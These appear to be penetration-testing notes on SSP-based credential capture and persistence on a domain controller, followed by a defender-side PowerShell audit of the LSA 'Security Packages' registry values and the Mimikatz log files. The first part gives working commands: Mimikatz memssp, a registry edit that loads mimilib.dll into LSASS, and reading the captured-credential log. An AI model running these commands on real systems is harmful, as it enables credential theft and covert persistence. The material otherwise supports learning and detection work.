Custom Security Service Providers (SSPs)

A Security Service Provider (Microsoft's own term is Security Support Provider, SSP) is a DLL that implements an authentication protocol behind the SSPI API; LSASS loads these DLLs and uses them to authenticate incoming and outgoing connections.

Standard SSPs include:

  • NTLM
  • Kerberos
  • Negotiate
  • Secure Channel (Schannel)
  • Digest
  • Credential Security Support Provider (CredSSP)

At startup, LSASS loads the SSP DLLs registered on the machine. An attacker who already holds the required privileges can register a custom DLL of their own, which is then loaded on the next machine startup and can log the credentials of every account that authenticates to that host, giving a way to persist further in the network.

Mimikatz ships its own SSP DLL (mimilib.dll), which is used as the example here.

Injecting the Custom DLL

  • Requires Domain Admin privileges and must be performed on the DC.

Method 1 - Using Mimikatz

  • Note: this does not work very well on Server 2016

Invoke-Mimikatz -Command '"misc::memssp"'

Method 2 - Drop mimilib.dll into system32 and add mimilib to the security packages

# Step 1 - Copy mimilib.dll to C:\Windows\System32

# Step 2 - Append "mimilib" to the REG_MULTI_SZ 'Security Packages' value so LSASS loads it on the next boot
$packages = Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' | select -ExpandProperty 'Security Packages'

$packages += "mimilib"

Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' -Value $packages

# Then check HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig in regedit to confirm the addition

Check the log files for creds

# either mimilsa.log or kiwissp.log depending on the attack
# I believe it's mimilsa.log if you use Mimikatz, kiwissp.log if you manually drop the DLL
type c:\windows\system32\mimilsa.log
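As an added defender-side example (not part of the original page and not Mimikatz's own code), the PowerShell below audits the 'Security Packages' values under both LSA registry keys, flags any package outside an assumed default baseline, checks whether the DLL each entry names exists in System32 and carries a valid Authenticode signature, and looks for the two log files named above. The baseline list, the function names and the Lsa (non-OSConfig) key being checked alongside OSConfig are assumptions for a default domain controller build; adjust them for your own environment.

```powershell
# Added audit example (not from the original page). Run elevated on the DC.

# Registry keys whose 'Security Packages' value LSASS reads at boot
$Keys = @(
    'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa',
    'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig'
)

# Assumed default package names for a current Windows Server build;
# treat this as a starting point, not an authoritative list.
$Baseline = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap')

function Get-SecurityPackageFindings {
    param(
        [string[]]$KeyPaths = $Keys,
        [string[]]$Known    = $Baseline
    )
    foreach ($key in $KeyPaths) {
        # Value is REG_MULTI_SZ, so it comes back as a string array (or $null)
        $value = (Get-ItemProperty -Path $key -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
        foreach ($pkg in @($value)) {
            if ([string]::IsNullOrWhiteSpace($pkg)) { continue }   # default entry can be an empty string
            $dll = Join-Path $env:SystemRoot "System32\$pkg.dll"
            $present = Test-Path -Path $dll
            $sig = if ($present) { Get-AuthenticodeSignature -FilePath $dll } else { $null }
            [pscustomobject]@{
                Key        = $key
                Package    = $pkg
                InBaseline = ($Known -contains $pkg)            # -contains is case-insensitive
                DllPresent = $present
                SigStatus  = if ($sig) { $sig.Status } else { 'n/a' }
                Signer     = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<none>' }
            }
        }
    }
}

function Get-SspLogFindings {
    # The two log file names the text above associates with mimilib / memssp
    foreach ($name in 'mimilsa.log', 'kiwissp.log') {
        $path = Join-Path $env:SystemRoot "System32\$name"
        if (Test-Path -Path $path) {
            $item = Get-Item -Path $path
            [pscustomobject]@{
                File      = $path
                SizeBytes = $item.Length
                LastWrite = $item.LastWriteTime
            }
        }
    }
}

# Report only entries worth a second look: unknown name, missing DLL, or bad/absent signature
Get-SecurityPackageFindings |
    Where-Object { -not $_.InBaseline -or -not $_.DllPresent -or $_.SigStatus -ne 'Valid' } |
    Format-Table -AutoSize

Get-SspLogFindings | Format-Table -AutoSize
```

Method 1 (misc::memssp) patches LSASS in memory and does not touch the registry, so the registry audit only surfaces Method 2; the log-file check and LSASS memory protections are what cover the in-memory variant. Enabling object access auditing on the Lsa key (registry modification events) gives a record of when 'Security Packages' last changed, which is the alert you actually want rather than a periodic scan.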